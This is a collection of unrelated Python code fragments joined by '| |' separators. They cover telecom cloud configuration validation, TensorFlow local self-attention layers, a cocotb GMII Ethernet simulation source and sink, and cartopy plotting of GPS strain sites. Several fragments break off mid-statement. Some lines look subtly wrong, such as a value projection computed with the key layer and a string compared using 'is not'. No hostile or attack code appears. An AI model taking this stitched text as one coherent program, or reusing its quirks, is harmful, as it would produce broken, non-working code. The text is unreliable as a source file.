if self.config_type == SUBCLOUD_CONFIG:
available_dc_role = [DISTRIBUTED_CLOUD_ROLE_SUBCLOUD]
elif self.config_type != REGION_CONFIG:
available_dc_role = [DISTRIBUTED_CLOUD_ROLE_SYSTEMCONTROLLER]
else:
raise ConfigFail("DISTRIBUTED_CLOUD_ROLE option is "
"not avaialbe for this configuration")
if self.system_dc_role not in available_dc_role:
raise ConfigFail(
"Available options for DISTRIBUTED_CLOUD_ROLE are: %s" %
available_dc_role)
if (self.system_dc_role ==
DISTRIBUTED_CLOUD_ROLE_SYSTEMCONTROLLER and
self.system_type == SYSTEM_TYPE_AIO):
raise ConfigFail("An All-in-one controller cannot be "
"configured as Distributed Cloud "
"System Controller")
elif self.config_type == SUBCLOUD_CONFIG:
self.system_dc_role = DISTRIBUTED_CLOUD_ROLE_SUBCLOUD
else:
self.system_dc_role = None
if self.cgcs_conf is not None:
self.cgcs_conf.add_section("cSYSTEM")
self.cgcs_conf.set("cSYSTEM", "TIMEZONE", timezone)
self.cgcs_conf.set("cSYSTEM", "SYSTEM_MODE", self.system_mode)
if self.system_dc_role is not None:
self.cgcs_conf.set("cSYSTEM", "DISTRIBUTED_CLOUD_ROLE",
self.system_dc_role)
def validate_storage(self):
if (self.conf.has_option('STORAGE', 'DATABASE_STORAGE') or
self.conf.has_option('STORAGE', 'IMAGE_STORAGE') or
self.conf.has_option('STORAGE', 'BACKUP_STORAGE') or
self.conf.has_option('STORAGE', 'IMAGE_CONVERSIONS_VOLUME') or
self.conf.has_option('STORAGE', 'SHARED_INSTANCE_STORAGE') or
self.conf.has_option('STORAGE', 'CINDER_BACKEND') or
self.conf.has_option('STORAGE', 'CINDER_DEVICE') or
self.conf.has_option('STORAGE', 'CINDER_LVM_TYPE') or
self.conf.has_option('STORAGE', 'CINDER_STORAGE')):
msg = "DATABASE_STORAGE, IMAGE_STORAGE, BACKUP_STORAGE, " + \
"IMAGE_CONVERSIONS_VOLUME, SHARED_INSTANCE_STORAGE, " + \
"CINDER_BACKEND, CINDER_DEVICE, CINDER_LVM_TYPE, " + \
"CINDER_STORAGE " + \
"are not valid entries in config file."
raise ConfigFail(msg)
def validate_pxeboot(self):
# PXEBoot network configuration
start_end_in_config = False
if self.config_type in [REGION_CONFIG, SUBCLOUD_CONFIG]:
self.pxeboot_section_name = 'REGION2_PXEBOOT_NETWORK'
else:
self.pxeboot_section_name = 'PXEBOOT_NETWORK'
if self.conf.has_section(self.pxeboot_section_name):
pxeboot_cidr_str = self.conf.get(self.pxeboot_section_name,
'PXEBOOT_CIDR')
try:
pxeboot_subnet = validate_network_str(pxeboot_cidr_str, 16)
if pxeboot_subnet.version != 4:
raise ValidateFail("Invalid PXEBOOT_NETWORK IP version - "
"only IPv4 supported")
self.configured_networks.append(pxeboot_subnet)
pxeboot_start_address = None
pxeboot_end_address = None
if self.conf.has_option(self.pxeboot_section_name,
"IP_START_ADDRESS"):
start_addr_str = self.conf.get(self.pxeboot_section_name,
"IP_START_ADDRESS")
pxeboot_start_address = validate_address_str(
start_addr_str, pxeboot_subnet
)
if self.conf.has_option(self.pxeboot_section_name,
"IP_END_ADDRESS"):
end_addr_str = self.conf.get(self.pxeboot_section_name,
"IP_END_ADDRESS")
pxeboot_end_address = validate_address_str(
end_addr_str, pxeboot_subnet
)
if pxeboot_start_address or pxeboot_end_address:
if not pxeboot_end_address:
raise ConfigFail("Missing attribute %s for %s" %
('IP_END_ADDRESS',
self.pxeboot_section_name))
if not pxeboot_start_address:
raise ConfigFail("Missing attribute %s for %s" %
('IP_START_ADDRESS',
self.pxeboot_section_name))
if not pxeboot_start_address < pxeboot_end_address:
raise ConfigFail("Start address %s not "
"less than end address %s for %s."
% (start_addr_str,
end_addr_str,
self.pxeboot_section_name))
min_addresses = 8
if not IPRange(start_addr_str, end_addr_str).size >= \
min_addresses:
raise ConfigFail("Address range for %s must contain "
"at least %d addresses." %
(self.pxeboot_section_name,
min_addresses))
start_end_in_config = True
self.pxeboot_network_configured = True
except ValidateFail as e:
raise ConfigFail("Invalid PXEBOOT_CIDR value of %s for %s."
"\nReason: %s" %
(pxeboot_cidr_str,
self.pxeboot_section_name, e))
if self.cgcs_conf is not None:
self.cgcs_conf.add_section('cPXEBOOT')
if self.pxeboot_network_configured:
self.cgcs_conf.set('cPXEBOOT', 'PXEBOOT_SUBNET',
str(pxeboot_subnet))
if start_end_in_config:
self.cgcs_conf.set("cPXEBOOT",
"PXEBOOT_START_ADDRESS",
start_addr_str)
self.cgcs_conf.set("cPXEBOOT",
"PXEBOOT_END_ADDRESS",
end_addr_str)
pxeboot_floating_addr = pxeboot_start_address
pxeboot_controller_addr_0 = pxeboot_start_address + 1
pxeboot_controller_addr_1 = pxeboot_controller_addr_0 + 1
else:
pxeboot_floating_addr = pxeboot_subnet[2]
pxeboot_controller_addr_0 = pxeboot_subnet[3]
pxeboot_controller_addr_1 = pxeboot_subnet[4]
self.cgcs_conf.set('cPXEBOOT',
'CONTROLLER_PXEBOOT_FLOATING_ADDRESS',
str(pxeboot_floating_addr))
self.cgcs_conf.set('cPXEBOOT', 'CONTROLLER_PXEBOOT_ADDRESS_0',
str(pxeboot_controller_addr_0))
self.cgcs_conf.set('cPXEBOOT', 'CONTROLLER_PXEBOOT_ADDRESS_1',
str(pxeboot_controller_addr_1))
self.cgcs_conf.set('cPXEBOOT', 'PXECONTROLLER_FLOATING_HOSTNAME',
'pxecontroller')
def validate_mgmt(self):
# Management network configuration
mgmt_prefix = NETWORK_PREFIX_NAMES[self.naming_type][MGMT_TYPE]
self.mgmt_network = Network()
if self.config_type == | |
N, H].
paddings: [B, T], or None if there is no padding.
segment_mask: [B, 1, T, S] or None. Not used right now.
per_step_padding: A mask used by decoder self-attention to prevent
information flow from future (causal padding). It has shape [B, 1, T] if
not None. Not used right now.
time_step: A scalar, the current decode step, 0-based.
use_short_seq_opt: A bool, whether using short sequence optimization. Not
supported right now.
Returns:
encoded: [B, 1, D].
updated_key_vec: [T, B, N, H].
updated_value_vec: [T, B, N, H].
Raises:
ValueError: If right_context is non-zero.
NotImplementedError: If use_short_seq_opt is true.
"""
p = self.params
if p.right_context != 0:
raise ValueError(
'Right context must be zero for autoregressive decoding.')
if use_short_seq_opt:
raise NotImplementedError('use_short_seq_opt is not supported yet.')
# Make local causal paddings, which have shape [B, T].
t, b, _, _ = py_utils.GetShape(cached_states.key, 4)
if paddings is None:
paddings = tf.zeros([b, t], dtype=query_vec.dtype)
position_diff = tf.tile(tf.range(t)[tf.newaxis, :], [b, 1]) - time_step
valid_atten = tf.math.logical_and(position_diff > -p.left_context,
position_diff <= 0)
local_causal_padding = 1.0 - tf.cast(valid_atten, dtype=query_vec.dtype)
paddings += local_causal_padding
return super().ExtendStep(theta, query_vec, cached_states, paddings,
segment_mask, per_step_padding, time_step,
use_short_seq_opt)
def zero_state(self, batch_size=1):
"""Returns the initial state given the batch size.
Args:
batch_size: the batch size.
Returns:
state: The initial state for streaming inference.
"""
p = self.params
assert p.enable_value_proj, 'Value projection must be enabled.'
assert p.right_context == 0, ('StreamingExtendStep does not support look '
'ahead')
key_state = tf.zeros(
shape=[
p.left_context, batch_size, p.num_heads, p.hidden_dim // p.num_heads
],
dtype=tf.float32)
value_state = tf.zeros(
shape=[
p.left_context, batch_size, p.num_heads, p.hidden_dim // p.num_heads
],
dtype=tf.float32)
state = py_utils.NestedMap(key=key_state, value=value_state)
return state
def StreamingExtendStep(self, query_vec, state, time_step):
"""Computes the value vector given the query of the current step.
This function doesn't know the length of full sequence, thus it is
different from ExtendStep.
Args:
query_vec: A query vector of shape [B, 1, D].
state: A `.NestedMap` object containing tensors {key, value} which are
results of previous attentions. key, value are of shape [T, B, N, H]
where T is the state size of this layer.
time_step: A tensor of shape [1] and type tf.int32. Note, we can not use
scalar tensor here because TfLiteConverter doesn't have good support of
it (b/138865275).
Returns:
output: Output of the given query vector with shape [B, 1, D].
state: updated state.
"""
p = self.params
assert p.enable_value_proj, 'Value projection must be enabled.'
assert p.right_context == 0, ('StreamingExtendStep does not support look '
'ahead')
query_vec = py_utils.with_dependencies([
py_utils.assert_shape_match(tf.shape(query_vec), [-1, 1, p.input_dim])
], query_vec)
state.key = py_utils.with_dependencies([
py_utils.assert_shape_match(
tf.shape(state.key),
[p.left_context, -1, p.num_heads, p.hidden_dim // p.num_heads])
], state.key)
state.value = py_utils.with_dependencies([
py_utils.assert_shape_match(
tf.shape(state.value),
[p.left_context, -1, p.num_heads, p.hidden_dim // p.num_heads])
], state.value)
t, b, n, h = py_utils.GetShape(state.key, 4) # t: context window size
# Computes key, value projection and updates state.
new_key_proj = self.key.FProp(self.theta.key, query_vec) # [B, 1, N, H]
new_key_proj = tf.reshape(new_key_proj, [1, b, n, h])
new_value_proj = self.key.FProp(self.theta.value, query_vec) # [B, 1, N, H]
new_value_proj = tf.reshape(new_value_proj, [1, b, n, h])
state.key = tf.concat([state.key[1:, :, :, :], new_key_proj], axis=0)
state.value = tf.concat([state.value[1:, :, :, :], new_value_proj], axis=0)
# For a time step less than the context window size, the time dimension of
# input of logits computation is equal to the time step (not a full context
# window).
t = tf.math.minimum(time_step[0] + 1, t)
key_input = state.key[-t:, :, :, :]
value_input = state.value[-t:, :, :, :]
# Computes query projection.
query_proj = self.query.FProp(self.theta.query, query_vec) # [B, 1, N, H]
# Scales the query projection.
if p.enable_per_dim_scale:
query_proj = self.per_dim_scale.FProp(self.theta.per_dim_scale,
query_proj)
else:
query_proj *= h**-0.5
query_proj = tf.reshape(query_proj, [b, n, h])
# Computes attention outputs.
# TODO(wildstone): Replaces the einsum ops used below with mat mul to get
# rid of TfLite Flex ops.
logits = self._AttenLogitsOneStep(self.theta, query_proj, key_input,
t - 1) # [T, B, N]
logits = tf.reshape(logits, [t, -1])
posteriors = tf.nn.softmax(logits, axis=0)
posteriors = tf.reshape(posteriors, [t, b, n])
output = tf.einsum('TBN, TBNH->BNH', posteriors, value_input)
# Post projection.
output = tf.expand_dims(output, 1)
output = self.post.FProp(self.theta.post, output)
return output, state
@classmethod
def FPropMeta(cls, p, *args):
raise NotImplementedError()
class LocalSelfAttentionXL(LocalSelfAttention):
"""Local causal version of transformer-xl self attention."""
@classmethod
def Params(cls):
p = super().Params()
p.Define('rel_pos_emb_dim', None,
'Dimension of relative positional embedding.')
p.Define('skip_term_b', False,
'If True, skip term_b in the paper section 3.3.')
return p
def __init__(self, params):
"""Constructs a LocalSelfAttentionXL object."""
super().__init__(params)
params = self.params
if params.rel_pos_emb_dim is None or params.rel_pos_emb_dim <= 0:
raise ValueError('Invalid rel_pos_emb_dim: %s' % params.rel_pos_emb_dim)
emb_params = layers.PositionalEmbeddingLayer.Params().Set(
embedding_dim=params.rel_pos_emb_dim)
self.CreateChild('pos_emb', emb_params)
# Projection layer for relative position encoding
dim_per_head = params.hidden_dim // params.num_heads
pos_proj_tpl = params.proj_tpl.Copy().Set(
input_dim=params.rel_pos_emb_dim,
num_heads=params.num_heads,
dim_per_head=dim_per_head,
use_bias=False)
self.CreateChild('pos_proj', pos_proj_tpl)
def _CreateLayerVariables(self):
super()._CreateLayerVariables()
params = self.params
dim_per_head = params.hidden_dim // params.num_heads
u_pc = py_utils.WeightParams(
shape=[params.num_heads, dim_per_head],
init=py_utils.WeightInit.Constant(0.0),
dtype=params.dtype,
collections=[self.__class__.__name__ + '_vars'])
v_pc = py_utils.WeightParams(
shape=[params.num_heads, dim_per_head],
init=py_utils.WeightInit.Constant(0.0),
dtype=params.dtype,
collections=[self.__class__.__name__ + '_vars'])
self.CreateVariable('u', u_pc)
self.CreateVariable('v', v_pc)
def _AttenLogits(self, theta, query, key):
b, u, w, _, _ = py_utils.GetShape(query)
_, _, c, _, _ = py_utils.GetShape(key)
n = self.params.num_heads
l = self.params.left_context
r = self.params.right_context
f = l + r
# term a and c
term_ac = tf.einsum('BUTNH,BUSNH->BNUTS', query + theta.u, key)
# term b and d
# [1, F]
pos = tf.expand_dims(tf.range(l - 1, -r - 1, -1), 0)
sin_emb = self.pos_emb.FPropWithPosition(theta.pos_emb, pos)
# [1, F, N, H]
sin_emb = self.pos_proj.FProp(theta.pos_proj, sin_emb)
# [F, N, H]
sin_emb = tf.squeeze(sin_emb, 0)
p = self.params
if not p.skip_term_b:
# [B, N, U, W, F]
term_bd = tf.einsum('BUWNH,FNH->BNUWF', query + theta.v, sin_emb)
# Perform relative shift in order to get [B, N, U, W, C]
# Pads the input to [B, N, U, C, C+1]
term_bd = tf.pad(term_bd,
((0, 0), (0, 0), (0, 0), (0, c - w), (0, c + 1 - f)))
# Reshapes to [B, N, U, C+1, C]. Note the output last dim is 1-smaller
# than the input, which "pushses" one element off to the next row for each
# row. The accumulated effect is row_i is right-shifted i steps (i>=0).
term_bd = tf.reshape(term_bd, [b, n, u, c + 1, c])
# Keeps useful slices. [B, N, U, W, C]
term_bd = tf.slice(term_bd, [0, 0, 0, 0, 0], [-1, -1, -1, w, -1])
else:
# [N, F]
term_d = tf.einsum('NH,FNH->NF', theta.v, sin_emb)
# [N, W, F]
term_d = tf.tile(tf.expand_dims(term_d, 1), [1, w, 1])
# [N, C, C+1]
term_d = tf.pad(term_d, ((0, 0), (0, c - w), (0, c + 1 - f)))
# [N, C+1, C]
term_d = tf.reshape(term_d, [n, c + 1, c])
# Keeps useful slices. [N, W, C]
term_d = tf.slice(term_d, [0, 0, 0], [-1, w, -1])
term_bd = tf.reshape(term_d, [1, n, 1, w, c])
return term_ac + term_bd
def _AttenLogitsOneStep(self, theta, query, key, time_step):
"""Attention logits for one single target (query) step.
Args:
theta: A `.NestedMap` object containing weights' values of this layer and
its children layers.
query: [B, N, H].
key: [S, B, N, H] or [S, B, N*H/128, 128].
time_step: Current time step.
Returns:
A Tensor of shape [S, B, N]
"""
p = self.params
s, b, _, _ = py_utils.GetShape(key, 4)
n = p.num_heads
h = p.hidden_dim // n
# Transformer_XL relative attention.
if time_step is None:
raise ValueError('`time_step` can not be None when using relative '
'position encoding in attention.')
# term a and c.
logits = tf.einsum('BNH,SBNH->SBN', query + theta.u,
tf.reshape(key, [s, b, n, h]))
position = tf.expand_dims(time_step - tf.range(s), 0)
# [1, s, emb_dim]
sin_emb = self.pos_emb.FPropWithPosition(theta.pos_emb, position)
sin_emb = self.pos_proj.FProp(theta.pos_proj, sin_emb)
# [s, n, h]
sin_emb = tf.squeeze(sin_emb, 0)
# term b an d.
if not p.skip_term_b:
logits += tf.einsum('BNH,SNH->SBN', query + theta.v, sin_emb)
else:
logits += tf.expand_dims(tf.einsum('NH,SNH->SN', theta.v, sin_emb), 1)
return logits
class RoutingAttention(MultiHeadedAttention):
""""Implements a sparse attention based on k-means clustering.
This is used in the routing transformer https://arxiv.org/pdf/2003.05997.
This verison of multi-headed attention differs from the full attention
in that it uses k-means clusterting to cluster the queries and keys | |
<gh_stars>0
"""
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import logging
import struct
import zlib
import cocotb
from cocotb.queue import Queue, QueueFull
from cocotb.triggers import RisingEdge, Timer, First, Event
from cocotb.utils import get_sim_time, get_sim_steps
from .version import __version__
from .constants import EthPre, ETH_PREAMBLE
from .reset import Reset
class GmiiFrame:
def __init__(self, data=None, error=None, tx_complete=None):
self.data = bytearray()
self.error = None
self.sim_time_start = None
self.sim_time_sfd = None
self.sim_time_end = None
self.tx_complete = None
if type(data) is GmiiFrame:
self.data = bytearray(data.data)
self.error = data.error
self.sim_time_start = data.sim_time_start
self.sim_time_sfd = data.sim_time_sfd
self.sim_time_end = data.sim_time_end
self.tx_complete = data.tx_complete
else:
self.data = bytearray(data)
self.error = error
if tx_complete is not None:
self.tx_complete = tx_complete
@classmethod
def from_payload(cls, payload, min_len=60, tx_complete=None):
payload = bytearray(payload)
if len(payload) < min_len:
payload.extend(bytearray(min_len-len(payload)))
payload.extend(struct.pack('<L', zlib.crc32(payload)))
return cls.from_raw_payload(payload, tx_complete=tx_complete)
@classmethod
def from_raw_payload(cls, payload, tx_complete=None):
data = bytearray(ETH_PREAMBLE)
data.extend(payload)
return cls(data, tx_complete=tx_complete)
def get_preamble_len(self):
return self.data.index(EthPre.SFD)+1
def get_preamble(self):
return self.data[0:self.get_preamble_len()]
def get_payload(self, strip_fcs=True):
if strip_fcs:
return self.data[self.get_preamble_len():-4]
else:
return self.data[self.get_preamble_len():]
def get_fcs(self):
return self.data[-4:]
def check_fcs(self):
return self.get_fcs() == struct.pack('<L', zlib.crc32(self.get_payload(strip_fcs=True)))
def normalize(self):
n = len(self.data)
if self.error is not None:
self.error = self.error[:n] + [self.error[-1]]*(n-len(self.error))
else:
self.error = [0]*n
def compact(self):
if self.error is not None and not any(self.error):
self.error = None
def handle_tx_complete(self):
if isinstance(self.tx_complete, Event):
self.tx_complete.set(self)
elif callable(self.tx_complete):
self.tx_complete(self)
def __eq__(self, other):
if type(other) is GmiiFrame:
return self.data == other.data
def __repr__(self):
return (
f"{type(self).__name__}(data={self.data!r}, "
f"error={self.error!r}, "
f"sim_time_start={self.sim_time_start!r}, "
f"sim_time_sfd={self.sim_time_sfd!r}, "
f"sim_time_end={self.sim_time_end!r})"
)
def __len__(self):
return len(self.data)
def __iter__(self):
return self.data.__iter__()
def __bytes__(self):
return bytes(self.data)
class GmiiSource(Reset):
def __init__(self, data, er, dv, clock, reset=None, enable=None, mii_select=None, reset_active_level=True, *args, **kwargs):
self.log = logging.getLogger(f"cocotb.{data._path}")
self.data = data
self.er = er
self.dv = dv
self.clock = clock
self.reset = reset
self.enable = enable
self.mii_select = mii_select
self.log.info("GMII source")
self.log.info("cocotbext-eth version %s", __version__)
self.log.info("Copyright (c) 2020 <NAME>")
self.log.info("https://github.com/alexforencich/cocotbext-eth")
super().__init__(*args, **kwargs)
self.active = False
self.queue = Queue()
self.dequeue_event = Event()
self.current_frame = None
self.idle_event = Event()
self.idle_event.set()
self.ifg = 12
self.mii_mode = False
self.queue_occupancy_bytes = 0
self.queue_occupancy_frames = 0
self.queue_occupancy_limit_bytes = -1
self.queue_occupancy_limit_frames = -1
self.width = 8
self.byte_width = 1
assert len(self.data) == 8
self.data.setimmediatevalue(0)
if self.er is not None:
assert len(self.er) == 1
self.er.setimmediatevalue(0)
assert len(self.dv) == 1
self.dv.setimmediatevalue(0)
self._run_cr = None
self._init_reset(reset, reset_active_level)
async def send(self, frame):
while self.full():
self.dequeue_event.clear()
await self.dequeue_event.wait()
frame = GmiiFrame(frame)
await self.queue.put(frame)
self.idle_event.clear()
self.queue_occupancy_bytes += len(frame)
self.queue_occupancy_frames += 1
def send_nowait(self, frame):
if self.full():
raise QueueFull()
frame = GmiiFrame(frame)
self.queue.put_nowait(frame)
self.idle_event.clear()
self.queue_occupancy_bytes += len(frame)
self.queue_occupancy_frames += 1
def count(self):
return self.queue.qsize()
def empty(self):
return self.queue.empty()
def full(self):
if self.queue_occupancy_limit_bytes > 0 and self.queue_occupancy_bytes > self.queue_occupancy_limit_bytes:
return True
elif self.queue_occupancy_limit_frames > 0 and self.queue_occupancy_frames > self.queue_occupancy_limit_frames:
return True
else:
return False
def idle(self):
return self.empty() and not self.active
def clear(self):
while not self.queue.empty():
frame = self.queue.get_nowait()
frame.sim_time_end = None
frame.handle_tx_complete()
self.dequeue_event.set()
self.idle_event.set()
self.queue_occupancy_bytes = 0
self.queue_occupancy_frames = 0
async def wait(self):
await self.idle_event.wait()
def _handle_reset(self, state):
if state:
self.log.info("Reset asserted")
if self._run_cr is not None:
self._run_cr.kill()
self._run_cr = None
self.active = False
self.data.value = 0
if self.er is not None:
self.er.value = 0
self.dv.value = 0
if self.current_frame:
self.log.warning("Flushed transmit frame during reset: %s", self.current_frame)
self.current_frame.handle_tx_complete()
self.current_frame = None
if self.queue.empty():
self.idle_event.set()
else:
self.log.info("Reset de-asserted")
if self._run_cr is None:
self._run_cr = cocotb.start_soon(self._run())
async def _run(self):
frame = None
frame_offset = 0
frame_data = None
frame_error = None
ifg_cnt = 0
self.active = False
clock_edge_event = RisingEdge(self.clock)
while True:
await clock_edge_event
if self.enable is None or self.enable.value:
if ifg_cnt > 0:
# in IFG
ifg_cnt -= 1
elif frame is None and not self.queue.empty():
# send frame
frame = self.queue.get_nowait()
self.dequeue_event.set()
self.queue_occupancy_bytes -= len(frame)
self.queue_occupancy_frames -= 1
self.current_frame = frame
frame.sim_time_start = get_sim_time()
frame.sim_time_sfd = None
frame.sim_time_end = None
self.log.info("TX frame: %s", frame)
frame.normalize()
if self.mii_select is not None:
self.mii_mode = bool(self.mii_select.value.integer)
if self.mii_mode:
# convert to MII
frame_data = []
frame_error = []
for b, e in zip(frame.data, frame.error):
frame_data.append(b & 0x0F)
frame_data.append(b >> 4)
frame_error.append(e)
frame_error.append(e)
else:
frame_data = frame.data
frame_error = frame.error
self.active = True
frame_offset = 0
if frame is not None:
d = frame_data[frame_offset]
if frame.sim_time_sfd is None and d in (EthPre.SFD, 0xD):
frame.sim_time_sfd = get_sim_time()
self.data.value = d
if self.er is not None:
self.er.value = frame_error[frame_offset]
self.dv.value = 1
frame_offset += 1
if frame_offset >= len(frame_data):
ifg_cnt = max(self.ifg, 1)
frame.sim_time_end = get_sim_time()
frame.handle_tx_complete()
frame = None
self.current_frame = None
else:
self.data.value = 0
if self.er is not None:
self.er.value = 0
self.dv.value = 0
self.active = False
self.idle_event.set()
class GmiiSink(Reset):
def __init__(self, data, er, dv, clock, reset=None, enable=None, mii_select=None, reset_active_level=True, *args, **kwargs):
self.log = logging.getLogger(f"cocotb.{data._path}")
self.data = data
self.er = er
self.dv = dv
self.clock = clock
self.reset = reset
self.enable = enable
self.mii_select = mii_select
self.log.info("GMII sink")
self.log.info("cocotbext-eth version %s", __version__)
self.log.info("Copyright (c) 2020 <NAME>")
self.log.info("https://github.com/alexforencich/cocotbext-eth")
super().__init__(*args, **kwargs)
self.active = False
self.queue = Queue()
self.active_event = Event()
self.mii_mode = False
self.queue_occupancy_bytes = 0
self.queue_occupancy_frames = 0
self.width = 8
self.byte_width = 1
assert len(self.data) == 8
if self.er is not None:
assert len(self.er) == 1
if self.dv is not None:
assert len(self.dv) == 1
self._run_cr = None
self._init_reset(reset, reset_active_level)
def _recv(self, frame, compact=True):
if self.queue.empty():
self.active_event.clear()
self.queue_occupancy_bytes -= len(frame)
self.queue_occupancy_frames -= 1
if compact:
frame.compact()
return frame
async def recv(self, compact=True):
frame = await self.queue.get()
return self._recv(frame, compact)
def recv_nowait(self, compact=True):
frame = self.queue.get_nowait()
return self._recv(frame, compact)
def count(self):
return self.queue.qsize()
def empty(self):
return self.queue.empty()
def idle(self):
return not self.active
def clear(self):
while not self.queue.empty():
self.queue.get_nowait()
self.active_event.clear()
self.queue_occupancy_bytes = 0
self.queue_occupancy_frames = 0
async def wait(self, timeout=0, timeout_unit=None):
if not self.empty():
return
if timeout:
await First(self.active_event.wait(), Timer(timeout, timeout_unit))
else:
await self.active_event.wait()
def _handle_reset(self, state):
if state:
self.log.info("Reset asserted")
if self._run_cr is not None:
self._run_cr.kill()
self._run_cr = None
self.active = False
else:
self.log.info("Reset de-asserted")
if self._run_cr is None:
self._run_cr = cocotb.start_soon(self._run())
async def _run(self):
frame = None
self.active = False
clock_edge_event = RisingEdge(self.clock)
while True:
await clock_edge_event
if self.enable is None or self.enable.value:
d_val = self.data.value.integer
dv_val = self.dv.value.integer
er_val = 0 if self.er is None else self.er.value.integer
if frame is None:
if dv_val:
# start of frame
frame = GmiiFrame(bytearray(), [])
frame.sim_time_start = get_sim_time()
else:
if not dv_val:
# end of frame
if self.mii_select is not None:
self.mii_mode = bool(self.mii_select.value.integer)
if self.mii_mode:
odd = True
sync = False
b = 0
be = 0
data = bytearray()
error = []
for n, e in zip(frame.data, frame.error):
odd = not odd
b = (n & 0x0F) << 4 | b >> 4
be |= e
if not sync and b == EthPre.SFD:
odd = True
sync = True
if odd:
data.append(b)
error.append(be)
be = 0
frame.data = data
frame.error = error
frame.compact()
frame.sim_time_end = get_sim_time()
self.log.info("RX frame: %s", frame)
self.queue_occupancy_bytes += len(frame)
self.queue_occupancy_frames += 1
self.queue.put_nowait(frame)
self.active_event.set()
frame = None
if frame is not None:
if frame.sim_time_sfd is None and d_val in (EthPre.SFD, 0xD):
frame.sim_time_sfd = get_sim_time()
frame.data.append(d_val)
frame.error.append(er_val)
class GmiiPhy:
def __init__(self, txd, tx_er, tx_en, tx_clk, gtx_clk, rxd, rx_er, rx_dv, rx_clk,
reset=None, reset_active_level=True, speed=1000e6, *args, **kwargs):
self.gtx_clk = gtx_clk
self.tx_clk = tx_clk
self.rx_clk = rx_clk
super().__init__(*args, **kwargs)
self.tx = GmiiSink(txd, tx_er, | |
llx0, llx1, lly0, lly1 = ax.get_extent(ccrs.PlateCarree())
sbllx = (llx1 + llx0) / 2
sblly = lly0 + (lly1 - lly0) * scale_loc[1]
tmc = ccrs.TransverseMercator(sbllx, sblly)
x0, x1, y0, y1 = ax.get_extent(tmc)
sbx = x0 + (x1 - x0) * scale_loc[0]
sby = y0 + (y1 - y0) * scale_loc[1]
# print(sbx, sby)
sbxe = ((sbx + length * 500)/5)*2
sbxf = round(sbx - length * 500)
j = sbxf
k = 1
while k <= 5:
bar_xs = [j, j + sbxe]
if k % 2 == 0:
ax.plot(bar_xs, [sby, sby], transform=tmc, solid_capstyle='butt', color='w', linewidth=15, zorder=10)
else:
ax.plot(bar_xs, [sby, sby], transform=tmc, solid_capstyle='butt', color='k', linewidth=15, zorder=11)
j += sbxe
k += 1
buffer = [patheffects.withStroke(linewidth=1.5, foreground="w")]
hei_ = kwargs.get('hei_', 5)
ax.text(-1*sbxf, sby+(hei_*sby), str(length) + ' km', transform=tmc, fontsize=12,
family='Arial', path_effects=buffer, horizontalalignment='left', verticalalignment='bottom')
ax.text(sbxf, sby+(hei_*sby), '0 km', transform=tmc, fontsize=12,
family='Arial', path_effects=buffer, horizontalalignment='right', verticalalignment='bottom')
# Add Colors to site locations
color_list = kwargs.get('color_list', ['g', 'b', 'r'])
arrows = kwargs.get('arrows', 'show')
for i in range(len(sites)):
plt.draw()
lon, lat = sites.longitude[i], sites.latitude[i]
trans = ccrs.PlateCarree()._as_mpl_transform(ax)
x, y = trans.transform_point((lon, lat))
x_ = ((x/my_dpi))/width
y_ = ((y/my_dpi))/height
axi = fig.add_axes([(x_ - (5/width)*0.5), (y_ - (5/height)*0.5), (5/width), (5/height)])
colors = color_list
scale_arrow = kwargs.get('scale_arrow', 40)
if arrows == 'show':
axi.quiver(sites['E velocity (mm/yr)'][i], sites['N velocity (mm/yr)'][i], scale=scale_arrow, width=0.0175, headwidth=3.5, color='k')
axi.plot(0, 0, marker='o', markersize=10, color=colors[i])
axi.axis('equal')
axi.axis('off')
sites_h = []
for i in range(3):
site_0 = Line2D([0], [0], marker='o', color='b', linestyle='--',fillstyle='full', markeredgecolor='red',
markeredgewidth=0.0, label=sites.site[i], markerfacecolor=color_list[i], markersize=15)
sites_h.append(site_0)
# Set Legend Location
loc_ = kwargs.get('loc', 'upper center')
# Add Legend
leg = ax.legend(handles=[sites_h[0], sites_h[1], sites_h[2]], ncol=3, loc=loc_, fontsize="x-large")
leg.get_frame().set_edgecolor('k')
leg.get_frame().set_linewidth(0.5)
leg.get_frame().set_alpha(0.75)
# Add Strain Ellipse
if V is not 'off':
plt.draw()
lon, lat = lonc, latc
trans = ccrs.PlateCarree()._as_mpl_transform(ax)
x, y = trans.transform_point((lon, lat))
x_ = ((x/my_dpi))/width
y_ = ((y/my_dpi))/height
ax2 = fig.add_axes([(x_), (y_), 0.2, 0.2])
ax2.set_xlim([-1,1])
ax2.set_ylim([-1,1])
strain_viz.def_ellipse(self, V)
ax2.axis('equal')
ax2.axis('off')
p1 = ax.get_position()
p2 = ax2.get_position()
ax2.set_position([x_ - (p2.width/2 + shiftx), y_ - (p2.height/2 + shifty), p2.width, p2.height])
axn = fig.add_axes([(x_), (y_), 0.05, 0.05])
buffer = [patheffects.withStroke(linewidth=4, foreground="w")]
axn.text(0.5, 0.0,u'\u25B2 \nN ', ha='center', fontsize=35, family='Arial', path_effects=buffer, rotation = 0)
axn.axis('equal')
axn.axis('off')
p3 = ax.get_position()
p4 = axn.get_position()
axn.set_position([p3.x0 + (0.05*p3.x1), p3.y0 + (0.05*p3.y1), 0.05, 0.05])
save_fig = kwargs.get('save_fig', None)
if save_fig is not None:
plt.savefig(str(save_fig), edgecolor='k', bbox_inches='tight')
def symbol_map(self, **kwargs):
sites = self.strain_data
ax = kwargs.get('ax', None)
fig = kwargs.get('fig', None)
end_sites = strain_viz.end_df(sites)
lonc, latc = strain_viz.get_center(sites)
# To shift the Strain Ellipse about the center
shiftx = kwargs.get('shiftx', 0)
shifty = kwargs.get('shifty', 0)
# Pick tiler type (http://maps.stamen.com/)
